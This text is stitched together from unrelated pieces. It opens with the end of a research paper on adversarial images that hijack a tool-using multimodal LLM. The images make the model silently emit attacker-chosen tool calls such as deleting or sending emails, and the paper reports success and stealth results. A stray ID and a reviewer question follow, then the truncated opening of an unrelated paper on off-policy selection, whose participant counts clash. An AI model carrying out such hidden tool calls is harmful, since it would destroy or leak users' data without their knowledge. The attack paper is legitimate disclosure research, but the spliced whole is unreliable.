the related prompts, during training, we mix them with a ratio of 85 : 15. 4.2 Metrics We feed our adversarial images to the model against prompts in the test datasets and obtain one response for each prompt. To evaluate the success and stealthiness of our attack, we consider three measures: the fraction of cases where the model emits a tool usage instruction in the response according to the attacker’s intent (success rate), the similarity between the perturbed image and the clean image (image stealthiness), and the indistinguishability between the model responses with and without the attack present in terms of being reasonable and natural (response utility). **Attack Success.** A successful attack would require an exact reproduction of the tool invocation instruction (exact match). However, a tool invocation may be produced with correct syntax but wrong arguments and fail (syntax match). We measure and report the proportion of these two cases among all tested prompt-response pairs as two metrics: - **Syntax.** Syntax match checks whether the tool invocation instruction in the generated response follows the correct syntax. The syntax here refers to a sequence of characters that is specific to each tool. For example, in `delete_email` attack the correct syntax consists of the tool name `function.delete_email` and a string argument `which=""`, wrapped by a pair of angle brackets. When the syntax is matched, the LLM will execute the tool with the arguments provided — whether the execution is exactly following the attacker’s intention depends on whether the arguments are precise. Failed syntax matches e.g., wrong or partial function/argument keywords, will not be parsed by the LLM, and those texts will be printed out and be seen by users. • **Exact.** Exact match measures whether the generated instruction in the response is exactly the same as the desired tool invocation instruction. Note that an exact match is always a syntax match. **Image Stealthiness.** We measure the visual difference between the perturbed adversarial image and its original. The more similar the two images are, the better the stealthiness of the attack. We use the popular Structural Similarity Index Measure (SSIM) to quantify the similarity between the two images. An SSIM score of $\geq 0.9$ is typically not distinguishable to humans: an example is shown in Appendix A.3. **Response Utility.** By definition, this is best measured by humans’ opinions on whether the conversation between the user and model looks reasonable and natural. However, we also consider several automated metrics since human annotations may not be possible in large-scale experiments e.g., our in- and out-domain test sets. These automated metrics all rely on responses generated with no attack present to compare against. Note that the response represents what a user sees in the conversation — a tool invocation with correct syntax is invisible to users and thus is excluded in the response. • **Human Preference (Human).** We ask human annotators to judge whether a response is natural and reasonable with respect to the question and the original clean image. Each prompt-response pair is judged by three graduate students majoring in Computer Science unrelated to this project and we obtain the final result with a majority vote to get rid of unusual preferences. The annotation guidelines can be found in Appendix A.4. • **Unattacked Image Loss (Loss).** For each question and a response, we obtain the (self-supervised) cross-entropy loss of the response given the question as a prefix, evaluated on the unattacked image. This loss measures how natural the clean model believes the response is. • **GPT-4 Selection (Selection).** We additionally generate three responses with no attack present (clean) and mix them with the response with the attack present (attacked). We then query GPT-4 to identify the most different text among the four. The random guess rate is 25% — an accuracy higher than that indicates GPT-4 can distinguish the clean responses from the attacked responses. The prompt we used is in Appendix A.4. • **BLEU/Rouge Scores.** We measured the BLEU/Rouge scores between the above-mentioned attacked responses and the three clean responses. Both scores measure the n-gram overlap between a text sequence and a list of reference text sequences and are widely used in machine translation and summarization, respectively. For Rouge scores, we utilized Rouge-1, Rouge-2, and Rouge-L scores as three different metrics. ### 4.3 Human Evaluation of Response Utility We are interested in how well our attack works from human perspectives in general and how closely the automated response utility metrics represent human preference. To understand these questions, we conduct a human evaluation on a subset of the responses from the experiment in Table 9. The subset is randomly sampled such that we have one response with the attack present for every 214 --- 2We tried to use other multimodal LLMs to imitate the human annotation but failed with poor results. Commercial ones like Bard are better but have not yet granted us API access. Leave as future work. Table 2: Evaluation of response utility on responses generated with and without attack present respectively given both image-related or image-unrelated prompts. Observe a drop of only 10% human preference scores with and without attack. | Responses | Human ↑ | Loss ↓ | Selection ↓ | BLEU ↑ | Rouge ↑ | |-----------|---------|--------|-------------|--------|---------| | | | | | | 1 ↑ | | | | | | | 2 ↑ | | | | | | | L ↑ | | **image-related** | | | | | | | w/o attack | 48 | 1.00 | 23 | 84 | 93 | | w/ attack | 37 | 1.20 | 83 | 38 | 65 | | **image-unrelated** | | | | | | | w/o attack | 86 | 0.71 | 24 | 72 | 82 | | w/ attack | 77 | 0.84 | 69 | 34 | 56 | questions in the in-domain test set.\(^3\) We collect one response for each such sampled question with no attack present as a baseline reference. **Analysis of Disagreements among Human Annotators.** The Cohen Kappa inter-annotator scores between (pairs of) annotators are in the range of 0.2 - 0.4. This indicates a certain, but not high, agreement between annotators, which is reasonable because annotators can interpret naturalness differently. As an alternative metric, we calculate the percentage of questions that annotators find the response with the attack present better than the clean response. This percentage is less than 7%, which is an indicator that annotators are mostly consistent in their preference. **Human Evaluation Result.** In Table 2, we show the human preference metric for the responses with and without the attack. We note that overall, the responses generated with the attack present show a drop of around 10% human preference scores compared to those generated without the attack. This indicates that our attack maintains the response utility fairly indistinguishable from clean responses. **Correlation Between Automated Metrics and Human Preferences.** We noticed that in Table 2 the GPT-4 Selection, BLEU, and Rouge metrics show unusual drops when the attack is present (much larger than the 10% drop in human preference scores). Therefore we conduct a study to understand which automated metrics best correlate with human preference. Here we only focus on the 214 responses generated with the attack present. Each automated metric represents a preference score on the naturalness and reasonableness of each response (for Loss and GPT-4 Selection we negate the value). We then calculate the AUC ROC score of the automated metrics against the human preference results (see Table 3). From the table, it is clear that for both image-related questions and image-unrelated questions, the Loss metric, among all the automated metrics, correlates with the human preference the best, by a large margin. Therefore, we decide to use only the loss metric for the evaluation of response utility. A possible concern is whether the averaged response utility metric would be misleading — is it possible that the responses are less likely to be reasonable when the adversarial image successfully triggers a correct tool invocation? We verified that this is not the case in Appendix A.8. ### 4.4 Experiment Results **The attack is successful, stealthy, and generalizable.** In Table 9 we evaluate our attack method on different attack variants, different images and on the unseen in-domain test set. For the three easier attack variants `delete_email`, `send_email`, `send_email_hard`, the success rate is close to 100% on the image-related set, while slightly lower on the image-unrelated set. For all attack variants, the SSIM score is close to 100%, and the Loss metric shows around 10% less preference than clean model generations, aligned with what we’ve seen in Table 2. Even though the success rates for the latter two more challenging attacks are relatively lower, it is fine because as long as the attack remains stealthy, it will take effect and harm users after it is spread to enough victims. --- \(^3\)50 image-related questions for 3 images and 64 image-unrelated questions. Table 3: AUC ROC scores for various automated metrics predicting human preference for response utility. | Metric | related | unrelated | |--------|---------|-----------| | Loss | 72 | 77 | | Selection | 50 | 59 | | BLEU | 61 | 64 | | Rouge-1 | 60 | 59 | | Rouge-2 | 60 | 61 | | Rouge-L | 61 | 58 | Table 4: Evaluation of our attack on image stealthiness (SSIM), attack success rate (Syntax/Exact %), and response utility (Loss) on the in-domain test set for image-related and -unrelated prompts. We additionally show the $L_2$ values and the $L_{inf}$ between the adversarial image and the original image. | Attack Variant | Image | SSIM | $L_2$ | $L_{inf}$ | In-domain Related | In-domain Unrelated | |----------------|-------|------|------|----------|--------------------|---------------------| | | | | | | Syntax Exact Loss | Syntax Exact Loss | | delete_email | | 0.91 | 5.16 | 0.12 | 98 98 1.09 | 78 78 0.8 | | | | 0.92 | 8.3 | 0.71 | 90 90 1.11 | 55 55 0.82 | | | | 0.87 | 7.52 | 0.26 | 92 92 1.11 | 73 73 0.78 | | send_email | | 0.90 | 6.0 | 0.2 | 98 98 1.08 | 69 69 0.77 | | | | 0.93 | 6.35 | 0.17 | 92 92 1.18 | 61 58 0.88 | | | | 0.92 | 5.4 | 0.18 | 100 100 1.04 | 69 69 0.78 | | send_email_hard| | 0.91 | 5.18 | 0.13 | 100 100 1.14 | 61 56 0.86 | | | | 0.91 | 7.96 | 0.34 | 100 68 1.08 | 48 31 0.87 | | | | 0.88 | 6.78 | 0.19 | 86 0 1.19 | 31 0 0.78 | | book_ticket | | 0.90 | 6.05 | 0.19 | 22 20 1.51 | 9 8 0.97 | | | | 0.94 | 6.25 | 0.18 | 0 0 1.23 | 0 0 0.82 | | | | 0.91 | 5.97 | 0.14 | 46 44 1.3 | 9 9 1.07 | | md_url_query | | 0.89 | 6.38 | 0.15 | 34 2 1.26 | 23 6 0.99 | | | | 0.89 | 14.14| 0.81 | 0 0 1.09 | 0 0 0.71 | | | | 0.91 | 5.95 | 0.18 | 32 10 1.02 | 27 8 0.77 | Table 5: Evaluation of the trained attack from Table 9 on out-domain test set. We pick only the three easier attack types as they are mostly successful in the in-domain setting. | Attack Variant | Image | SSIM | Out-domain Related | Out-domain Unrelated | |----------------|-------|------|--------------------|---------------------| | | | | Syntax Exact Loss | Syntax Exact Loss | | delete_email | | 0.91 | 98 98 1.18 | 66 66 0.58 | | | | 0.92 | 62 62 0.98 | 54 54 0.76 | | | | 0.87 | 92 92 0.83 | 68 68 0.58 | | send_email | | 0.90 | 100 100 1.18 | 62 62 0.6 | | | | 0.93 | 66 66 1.14 | 50 48 0.68 | | | | 0.92 | 98 98 0.84 | 80 80 0.64 | | send_email_hard| | 0.91 | 96 96 1.27 | 56 50 0.69 | | | | 0.91 | 86 80 1.0 | 28 20 0.78 | | | | 0.88 | 60 0 0.9 | 40 0 0.66 | The attack is also generalizable to out-domain samples. In Table 5 we evaluate on the unseen, out-domain samples from the out-domain test set, using the same adversarial images in Table 9. The results indicate that the attacked images transfer almost equally well to out-domain examples. We also experimentally verified that (1) the response utility controlling variable $\lambda_r$ improves the response utility and (2) we can sacrifice image stealthiness to make the attack more likely to be successful for hard attack variants in Appendix A.7. These bring more flexibility and customizability to the attack according to different use cases. 5 DISCUSSION & CONCLUSION In this paper, we propose a novel attack against multimodal LLMs integrated with third-party tools. Adversarial images crafted in our attack are capable of manipulating the victim LLM to generate attacker-specified tool invocations following complex non-natural-language syntax and thus can harm the confidentiality and integrity of users’ resources. In addition, these adversarial images are highly stealthy since they look benign and do not affect a natural and reasonable user-LLM conversation. However, our attack has the limitation of being white-box i.e., requiring access to the model parameters, and does not apply to closed-source LLMs. Also, the attack currently only shows proof of validity on a single multimodal LLM, but not for all such models. Along this line, it would be interesting to explore black-box transferability to other multimodal LLMs. The attack and methodology described in this paper may be utilized in a malicious way by real-world attackers. Despite the risk involved, we believe it’s crucial to disclose such risks of multimodal LLMs in full before more open-weight multimodal LLMs integrated with tools are adopted in production. We will publish the entire codebase in the future. We also suggest that strict authorization should be enforced on LLMs’ access to third-party tools as a bottom-line defense for now. REFERENCES Jean-Baptiste Alayrac, Jeff Donahue, Pauline Luc, Antoine Miech, Iain Barr, Yana Hasson, Karel Lenc, Arthur Mensch, Katherine Millican, Malcolm Reynolds, et al. Flamingo: a visual language model for few-shot learning. *Advances in Neural Information Processing Systems*, 35:23716–23736, 2022. AutoGPT. Auto-gpt-plugins. https://github.com/Significant-Gravitas/Auto-GPT-Plugins, 2023. Eugene Bagdasaryan, Tsung-Yin Hsieh, Ben Nassi, and Vitaly Shmatikov. (ab)using images and sounds for indirect instruction injection in multi-modal llms, 2023. Nicholas Carlini, Milad Nasr, Christopher A. Choquette-Choo, Matthew Jagielski, Irena Gao, Anas Awadalla, Pang Wei Koh, Daphne Ippolito, Katherine Lee, Florian Tramer, and Ludwig Schmidt. Are aligned neural networks adversarially aligned?, 2023. Danny Driess, Fei Xia, Mehdi S. M. Sajjadi, Corey Lynch, Aakanksha Chowdhery, Brian Ichter, Ayzaan Wahid, Jonathan Tompson, Quan Vuong, Tianhe Yu, Wenlong Huang, Yevgen Chebotar, Pierre Sermanet, Daniel Duckworth, Sergey Levine, Vincent Vanhoucke, Karol Hausman, Marc Toussaint, Klaus Greff, Andy Zeng, Igor Mordatch, and Pete Florence. Palm-e: An embodied multimodal language model, 2023. Rohit Girdhar, Alaaeldin El-Nouby, Zhuang Liu, Mannat Singh, Kalyan Vasudev Alwala, Armand Joulin, and Ishan Misra. Imagebind: One embedding space to bind them all. In *Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition*, pp. 15180–15190, 2023. Ian J Goodfellow, Jonathon Shlens, and Christian Szegedy. Explaining and harnessing adversarial examples. *arXiv preprint arXiv:1412.6572*, 2014. Kai Greshake, Sahar Abdelnabi, Shailesh Mishra, Christoph Endres, Thorsten Holz, and Mario Fritz. Not what you’ve signed up for: Compromising real-world Ilm-integrated applications with indirect prompt injection, 2023. Neel Jain, Avi Schwarzschild, Yuxin Wen, Gowthami Somepalli, John Kirchenbauer, Ping yeh Chiang, Micah Goldblum, Aniruddha Saha, Jonas Geiping, and Tom Goldstein. Baseline defenses for adversarial attacks against aligned language models, 2023. Diederik P Kingma and Jimmy Ba. Adam: A method for stochastic optimization. *arXiv preprint arXiv:1412.6980*, 2014. LangChain. Langchain integrations. https://integrations.langchain.com/, 2023. Haotian Liu, Chunyuan Li, Qingyang Wu, and Yong Jae Lee. Visual instruction tuning. *arXiv preprint arXiv:2304.08485*, 2023. Aleksander Madry, Aleksandar Makelov, Ludwig Schmidt, Dimitris Tsipras, and Adrian Vladu. Towards deep learning models resistant to adversarial attacks. *arXiv preprint arXiv:1706.06083*, 2017. Natalie Maus, Patrick Chao, Eric Wong, and Jacob Gardner. Adversarial prompting for black box foundation models. *arXiv*, 2023. Microsoft. A guidance language for controlling large language models. https://github.com/guidance-ai/guidance, 2023a. Microsoft. Microsoft semantic extension. https://github.com/microsoft/semantic-kernel/blob/334b22a78460a46b91391c1b41f79e23d55338c2/dotnet/src/Extensions/Planning.SequentialPlanner/skprompt.txt, 2023b. OpenAI. Chatgpt plugins. https://openai.com/blog/chatgpt-plugins, 2023a. OpenAI. Chatgpt plugins guides. https://platform.openai.com/docs/guides/function-calling, 2023b.
ekdurSMmbH
* Why do the authors believe clustering improves performance? If the initial state is unique to participants wouldn't it be possible to learn a single policy that performs well across all states? Why do they think this doesn't happen? Is the policy class being trained on offline data not rich enough?
Universal Off-Policy Selection for Human-Centric Systems via Participant Sub-grouping Anonymous authors Paper under double-blind review Abstract Human-centric tasks like healthcare and education are characterized by heterogeneity among patients and students, resulting in different disease trajectories and learning styles that require personalized treatments or instructional interventions for specific subgroups. When deploying reinforcement learning (RL) for such tasks, off-policy selection (OPS) is essential, since it closes the loop by selecting and evaluating RL-induced policies offline, without the need for any online interaction with the participants. Many pre-existing OPS methods, however, do not consider the heterogeneity among the participants. In this work, we introduce a universal off-policy selection (UOPS) approach to address the issue of participant heterogeneity by taking a multi-step approach. Initially, it divides the participants into sub-groups, grouping together those who exhibit similar behaviors. Subsequently, it acquires OPS criteria tailored to each of these sub-groups. Consequently, when new participants come, they will receive policy recommendations based on the sub-groups they align with. This methodology enhances the adaptability and personalization of the RL system, ensuring that policy selections align more closely with the unique characteristics of each participant or group of participants. We evaluate UOPS’ effectiveness through two applications: an intelligent tutor system that has been used in classrooms for over eight years, as well as a healthcare application for sepsis treatment and intervention. In both applications, UOPS shows significant improvements in students’ learning and patient outcomes. 1 Introduction Human-centric systems (HCSs), e.g., used in healthcare facilities (Raghu et al., 2017; Namkoong et al., 2020; Gao et al., 2020) and intelligent education (IE) (Chi et al., 2011; Koedinger et al., 1997; VanLehn, 2006), have widely employed reinforcement learning (RL) to enhance user experience by improving outcomes of disease treatment, knowledge gaining, etc. Specifically, RL has been used in healthcare to automate treatment procedures (Raghu et al., 2017), or in IE that can induce policies automatically adapting difficulties of course materials and helping students to setup and refine study plans to improve learning outcomes (Liu et al., 2022; Zhou et al., 2022). Though various existing offline RL methods can be adopted (Haarnoja et al., 2018; Kumar et al., 2020; Chen et al., 2021) for policy optimization, validation of policies’ performance is often conducted by online testing (Silver et al., 2018; Wurman et al., 2022; Vinyals et al., 2019; Fu et al., 2021b). Given the long testing horizon (e.g., several years, or semesters, in healthcare, and IE, respectively) and the high cost of recruiting participants, online testing is considered exceedingly time- and resource-consuming, and sometimes could even be hindered by protocols overseeing human involved experiments, e.g., performance and safety justifications need to be provided before new medical device controllers can be tested on patients (Parvinian et al., 2018). Recently, off-policy evaluation (OPE) methods have been proposed to tackle such challenges by estimating the performance of target (evaluation) RL policies with offline data, which only requires the trajectories collected over behavioral polices given a priori; similarly, off-policy selection (OPS) targets to determine the most promising policies, out of the ones trained with different algorithms or hyper-parameter sets, that can be used for online deployment (Chandak et al., 2022; Fu et al., 2021a; Nie et al., 2022; Yang et al., 2022; Zhang & Jiang, 2021). However, most existing OPS and OPE methods are designed in the context of homogenic agents, such as in robotics or games, where characteristics of the agents can be captured by their specifications, which are in general assumed... fully known (e.g., degree of freedom, angular constraint of each joint). In contrast, in HCSs, the participants can have highly diverse backgrounds, where each person may be associated with unique underlying characteristics that are not straightforward to be captured individually; due to the partial observability of participants’ mind states and the limited size of the cohort that can be recruited for experiments with HCSs. For example, patients participated in healthcare research studies could have different health/disease records, while the students using an intelligent tutoring system in IE may have different mindsets toward studying the course. As a result, the optimal criteria for selecting the policy to be deployed to each participant can vary, and, more importantly, it would be intractable for existing OPS/OPE frameworks to determine what the policy selection criteria would be for a new participant who just joined the cohort. In this work, we introduce universal off-policy selection (UOPS), which addresses the problem of determining the OPS criteria needed for each new participant joining the cohort (i.e., at \( t = 0 \) only, or without using information obtained from \( t \geq 1 \) onwards), assuming that we have access to offline trajectories for a small batch of participants \textit{a priori}, i.e., the offline data. Specifically, it first partitions the participants from the offline dataset into sub-groups, clustering together the ones pertaining to similar behaviors. Then, an unbiased value function estimator, with bounded variance, is developed to determine the policy selection criteria for each sub-group. At last, when new participants join, they will be recommended with policies selected according to the sub-groups they fall within. Note that UOPS is distinguished from typical off-policy selection (OPS) setup in the sense that, the major goal of prior OPS approaches is to select the best policy over the entire population, while UOPS aims to decide the best policy for each student who arrives to the HCS on-the-fly, leveraging the information observed at the initial step (\( t = 0 \)) only. The key contributions of this work are summarized as follows: \((i)\) We introduce the UOPS framework which is critical for closing the gap between offline RL policy optimization and OPS in selecting policies to be deployed over individual participants in HCSs. To the best of our knowledge, this is the first framework that considers the new participant arrival’s problem in the context of OPS. \((ii)\) We conduct extensive experiments to evaluate UOPS in a \textit{real-world IE system}, with 1,288 students participating over 5 years. Results have shown that, with the help of UOPS, it improved the learning outcomes by 208\% compared to policy selection criteria hand-crafted by instructors. Moreover, it leads to 136\% increased outcome compared to policies selected by existing OPS methods. \((iii)\) UOPS is also evaluated against an important healthcare application, i.e., septic shock treatment [Raghu et al., 2017; Namkoong et al., 2020; Oberst & Sontag, 2019], where it can accurately identifying the best treatment policies to be deployed to incoming patients, and outperforms existing OPS methods. ## 2 Universal Off-Policy Selection (UOPS) In this section, we introduce the UOPS method, which determines the policy to be deployed to new participants that join an existing cohort, conditioned only on their initial states. Specifically, the participants pertaining to the offline dataset are partitioned into sub-groups according to their past behavior. Then, a variational auto-encoding (VAE) model is used to generate synthetic trajectories for each sub-group, augmenting the dataset and improving the state-action coverage. Moreover, an unbiased value function estimator, with bounded variance, is developed to determine the policy selection criteria for each sub-group. At last, when new participants join, they will be recommended with the policies conditioned on the sub-groups they fall within respectively. We start with a subsection that introduces the problem formulation formally. ### 2.1 Problem Formulation The HCS environment is formulated as a human-centric Markov decision process (HI-MDP), which is a 7-tuple \((S, A, P, S_0, R, I, \gamma)\). Specifically, \( S \) is the state space, \( A \) is the action space, \( P : S \times A \rightarrow S \) defines transition dynamics from the current state and action to the next state, \( S_0 \) defines the initial state distribution, \( R : S \times A \rightarrow \mathbb{R} \) is the reward function, \( I \) is the set of participants involved in the HCS, \( \gamma \in (0, 1] \) is discount factor. Episodes are of finite horizon \( T \). At each time-step \( t \) in online policy deployment, the agent observes the state \( s_t \in S \) of the environment, then chooses an action \( a_t \in A \) following the target (evaluation) policy \( \pi \). The environment accordingly provides a reward \( r_t = R(s_t, a_t) \), and the agent observes the next state \( s_{t+1} \) determined by \( P \). A trajectory is denoted as \( \tau^{(i)}_\pi = [\ldots, (s^{(i)}_t, a^{(i)}_t, r^{(i)}_t, s^{(i)}_{t+1}), \ldots]_{t=1}^T \). Moreover, we consider having access to a historical trajectory set (i.e., offline dataset) collected under a behavioral policy \( \beta \neq \pi \), \( D_\beta = \{\ldots, \tau^{(i)}_\beta, \ldots\}_{i=1}^N \). which consist of $N$ trajectories. We first make two assumptions in regards to the correspondence between trajectories and participants, and the initial state distribution for each participant, respectively. **Assumption 1 (Trajectory-Participant Correspondence).** As a participant in human-centric experiments is in general unlikely to undergo exactly the same procedure more than once under the topic being studied, we assume that there exist a unique correspondence between each trajectory $\tau^{(i)}$ and the participant $(i \in I)$ from which the trajectory is logged. We henceforth can use $i$ to refer to index either a trajectory from the offline dataset, or the corresponding participant, depending on the context. **Assumption 2 (Independent Initial State Distributions).** The initial state of each trajectory $s_0^{(i)} \in \tau^{(i)}$, corresponding to a unique (the $i$-th) participant following from the assumption above, is sampled from an initial state distribution $S_0(i)$ conditioned on $i$-th participant’s characteristics and past records (i.e., specific to the $i$-th trajectory), and is independent from all other $S_0(j)$’s where $j \in [1, N] \setminus i$. The assumptions above reflect the scenarios that are specific to HCS – for example, a patient is unlikely to be prescribed the same surgery twice. Even if the patient has to undergo a follow-up surgery that is of the similar type (e.g., mostly seen in trauma or orthopedics departments), the second time when the patient comes in he/she will start with a rather different initial state, since the pathology may have already been intervened as a result of the last visit. Consequently, one can treat such a visit as a new (synthetic) participant who just join and has the health record same as the one updated after the last visit. In other words, a participant being considered in this paper can be generalized, e.g., to a hospital visit, or a student participating in a specific course supported by intelligent education (IE) systems, depending on the context. Moreover, assumption 2 directly follows from the philosophy illustrated in assumption 1 – the initial state of each trajectory depend on the corresponding participant’s unique characteristics and historical records before joining the experiment/cohort, and can be considered mutually independent across all participants. Now we define the goal for UOPS. **Problem 1.** The goal of UOPS is to select the best policy $\pi$ from a set of pre-trained (candidate) policies $\Pi$, $\pi \in \Pi$, for each of the new participants $i' \in \{N + 1, N + 2, \ldots\}$ joining (i.e., arriving at) the HCS with an observable initial state $s_0 \sim S_0(i')$ (but the rest of the trajectory remain unobservable), that maximizes the expected accumulated return $V^\pi$, $\max_{\pi \in \Pi} V^\pi$, over the full horizon $T$; here $V^\pi = \mathbb{E}_{s_0 \sim S_0(i'), (s_t > 0, a_t > 0) \sim \rho^\pi, r_t \sim R}[\sum_{t=1}^{T} \gamma^{t-1} r_t | \pi]$, and $\rho^\pi$ is the state-action visitation distribution under $\pi$ from step $t = 1$ onwards. Note that the problem formulation here is different than the typical OPS/OPE setup used in existing works ([Jiang & Li](#), [Thomas & Brunskill](#), [Doroudi et al.](#), [Yang et al.](#), [Zhang et al.](#), [Gao et al.](#), [Le et al.](#)), as only the initial state $s_0$ is available for policy selection. Such a formulation is aligned with use cases under HCSs, e.g., treatment plan needs to be laid out soon after a new patient is admitted to the intensive care unit (ICU) in medical centers. However, most indirect OPS methods such as importance sampling (IS) ([Precup](#), [Doroudi et al.](#)) and doubly robust (DR) ([Jiang & Li](#), [Thomas & Brunskill](#)) require the entire trajectory to be observed, in order to estimate $V^\pi$. Though direct methods like fitted-Q evaluation (FQE) ([Le et al.](#)) could be used as a workaround, they do not take into account the unique characteristics for each participant that plays a crucial role in HCS applications; results in Section 3 show that they in general underperform in the real-world IE experiment. To address both challenges, we introduce the UOPS approach, starting with the sub-group partitioning step introduced below. ### 2.2 Sub-group Partitioning In this sub-section, we introduce the sub-group partitioning step that partition the participants in the offline dataset into sub-groups. Furthermore, value functions over all candidate policies $\pi \in \Pi$ are learned respectively for each sub-group, to be leveraged as the OPS criteria for each sub-group. **Sub-group partitioning.** The partitioning is performed over the initial state of each trajectory in the offline dataset, $\tau_\beta \in \mathcal{D}$. Given assumptions 1 and 2 and the fact that $S_0(i)$’s in general only share limited support across participants (i.e., every human has unique characteristics and past experience), such partitioning is essentially performed at per-participant level. Specifically, we consider partitioning the participants into $M$ sub-groups. Then for all sub-groups, $K_m$’s, in the set of sub-groups, $\mathcal{K} = \{K_1, \ldots, K_M\}$, we have $\bigcup_{m=1}^{M} K_m = S_0$ and $K_m \cap K_n = \emptyset, \forall m \neq n$. The total number of groups $M$ needed can be determined using silhouette scores (Hallac et al., 2017). Denote the partition function $k(\cdot) : S_0 \rightarrow \mathcal{K}$. We then define the value function specific to each sub-group. **Definition 1 (Value Function per Sub-group).** The value function over policy $\pi$, $V^\pi_{K_m}$, specific to the sub-group $K_m$, is the expected accumulative return over the initial states that correspond to the set of participants $\mathcal{I}_m = \{i | k(s_0^{(i)}) = K_m, i \in \mathcal{I}\}$ residing in the same sub-group. Specifically, $$V^\pi_{K_m} = \mathbb{E}_{s_0 \sim \text{Unif}(\{S_0(i) | i \in \mathcal{I}_m\}), (s_t > 0, a_t > 0) \sim \rho^\pi, r \sim B\left(\sum_{t=1}^{T} \gamma^{t-1} r_t |\pi\right)}[s_0 \sim \text{Unif}(\{S_0(i) | i \in \mathcal{I}_m\})]$$ representing that $s_0$ is sampled from a uniformly weighted mixture of distributions over $\{S_0(i) | i \in \mathcal{I}_m\}$, pertaining to sub-group $K_m$. The goal of sub-group partitioning is to learn the partition function $k(\cdot)$, such that the difference between the value of the best policy candidate, $\max_{\pi \in \Pi} V^\pi_{K_m}$, and the value of the behavioral policy, $V^\beta_{K_m}$, is maximized for all participants $i \in \mathcal{I}$ and sub-groups $K_m \in \mathcal{K}$, i.e., $$\max_k \sum_{i \in \mathcal{I}} \left( \max_{\pi \in \Pi} V^\pi_{K_m=k(s_0^{(i)})} - V^\beta_{K_m=k(s_0^{(i)})} \right).$$ (1) The objective (1) is designed in the sense that participants may benefit more from the type of policies that fit better for their individual characteristics. For example, in IE, different candidate lecturing policies may be used toward prospective high- and low-performers respectively, as justified by the findings from our real-world IE experiment (centered around Figure 2 in Section 3.2). The value provided by different policies for a specific type of learners (i.e., sub-group) could be different, measured by $V^\pi_{K_m} - V^\beta_{K_m}$ for all $\pi \in \Pi$; here, $V^\beta_{K_m}$ captures the expected return from a instructor-designed, one-size-fit-all baseline (i.e., behavioral) policy that is used to collect offline data (Mandel et al., 2014; VanLehn, 2006; Zhou et al., 2022). Then, it would be crucial to identify to which group each student belongs, as it can maximize the returns collected by each student throughout the horizon. **Optimization over the sub-typing objective (1).** The overall sub-typing objective (1) can be achieved using a two-step approach, i.e., (i) pre-partitioning with offline dataset, followed by (ii) deployment upon observation of the initial states of arriving participants. Due to space limitation, the specific steps can be found in Appendix B.1. **Theorem 1.** Define the estimator $\hat{D}^{\pi,\beta}_{K_m}$ as, i.e., $$\hat{D}^{\pi,\beta}_{K_m} = \frac{1}{|\mathcal{I}_m|} \sum_{i \in \mathcal{I}_m} \left( \omega_i \sum_{t=1}^{T} \gamma^{t-1} r_t^{(i)} - \sum_{t=1}^{T} \gamma^{t-1} r_t^{(i)} \right);$$ (2) here, $\mathcal{I}_m$ follows the definition above, which is the set of participants grouped in $K_m$; $\omega_i = \prod_{t=1}^{T} \pi(a_t^{(i)} | s_t^{(i)}) / \beta(a_t^{(i)} | s_t^{(i)})$ is the IS weight for the $i$-th trajectory in the offline dataset; $s_t^{(i)}, a_t^{(i)}, r_t^{(i)}$ are the states, actions, rewards logged in the offline trajectory, respectively. Then, $\hat{D}^{\pi,\beta}_{K_m}$ is unbiased, with its variance bounded by, i.e., $$\text{Var}(\hat{D}^{\beta,\pi}) \leq \left\| \sum_{t=1}^{T} \gamma^{t-1} r_t \right\|^2_\infty \left( \frac{1}{\text{ESS}} - \frac{1}{N} \right),$$ (3) with ESS being the effective sample size (Kong, 1992). The proof of theorem 1 is provided in Appendix B.2. ### 2.3 Trajectories Augmentation within Each Sub-group In HCSs, each sub-group may only contain a limited number of participants, due to the high cost of recruiting participants as well as time constraints in real-world experiments. For example, in the IE experiment in Section 3, one sub-group only contains 45 students as a result from sub-group partitioning. Consequently, the overall offline trajectories within each group may cover limited visitations of the state and action spaces, and make the downstream policy selection task challenging (Nie et al., 2022). Latent-model-based data augmentation has been commonly employed... in previous offline RL \cite{Hafner2020,Lee2020,Rybkin2021,Gao2022}, to resolve similar issues. For this sub-section, we specifically consider the variational auto-encoder (VAE) architecture introduced in \cite{Gao2022}, as it is originally designed for offline setup as well. Now we briefly introduce the VAE setup, which can capture the underlying dynamics and generate synthetic offline trajectories to improve the state-action visitation coverage within each subgroup. Specifically, given the offline trajectories $T_m$ specific to the subgroup $K_m$, the VAE consists of three major components, i.e., (i) the latent prior $p(z_0)$ that represents the distribution of the initial latent states over $T_m$; (ii) the encoder $q_\eta(z_t|s_{t-1}, a_{t-1}, s_t)$ that encodes the MDP transitions into the latent space; (iii) the decoders $p_\xi(z_t|z_{t-1}, a_{t-1}), p_\xi(s_t|z_t), p_\xi(r_{t-1}|z_t)$ that reconstructs new samples. The training objective is formulated as an evidence lower bound (ELBO) specifically derived for the architecture above. More details can be found in Appendix B.3. Consequently, for the trajectories in each subgroup, $T_m$, the VAE can be trained to generate a set of synthetic samples, denoted as $\hat{T}_m$. In the Section 3.2, we further discuss and justify the need of trajectory augmentation through an real-world intelligent education (IE) experiment. ### 2.4 The UOPS Algorithm The overall flow of the UOPS framework is described in Algorithm 1. The training phase directly follow from the sub-sections above. Upon deployment, UOPS can help HCSs monitor each arriving participant, determine the sub-group the participant falls within, and select the policy to be deployed according to the initial state. Such real-time adaptability is important for HCSs in practice, and is different from existing OPS works which in general assume either the full trajectories or population characteristics are known \cite{Keramati2022,Yang2022,Zhong2022}. For example, in practical IE, students may start learning irregularly according to their own schedules, hence can create discrepancies in their start times. Such methods fall short in cases when selecting policies based on population or sub-group information in the upcoming semester – they requires the data from all arriving students are collected upfront, which would be unrealistic. Note that, to the best of our knowledge, we are the first work that formally consider the problem of sub-typing arriving participants, and UOPS is the first approach that solves this practical problem by introducing a framework that can work with HCSs in the real-world. ### 3 Experiments UOPS is tested over two types of HCSs, i.e., intelligent education (IE) and healthcare. Specifically, the real-world IE experiment involves 1,148 student participating in college entry-level probability course across 6 academic semesters. The goal is to use the data collected from the students of the first 5 semesters, to assign pre-trained RL lecturing policies to every student enrolled in the 6-th semester, in order to maximize their learning outcomes. The healthcare experiment targets for selecting pre-configured policies that can best treat patients with sepsis, over a simulated environment widely adopted in existing works \cite{Hao2021,Nie2022,Tang2021,Lorberbom2021,Gao2023,Namkoong2020}. ### 3.1 Baselines **Existing OPS/OPE.** The most straightforward approach to facilitate OPS in HCSs is to select policies via existing OPS/OPE methods, by choosing the candidate target policy $\pi \in \Pi$ that achieves the maximum estimated return over the entire offline dataset, i.e., indiscriminately across all potential sub-groups. Specifically, 6 commonly used OPE methods are considered, i.e., Weighted IS (WIS) \cite{Precup2000}, 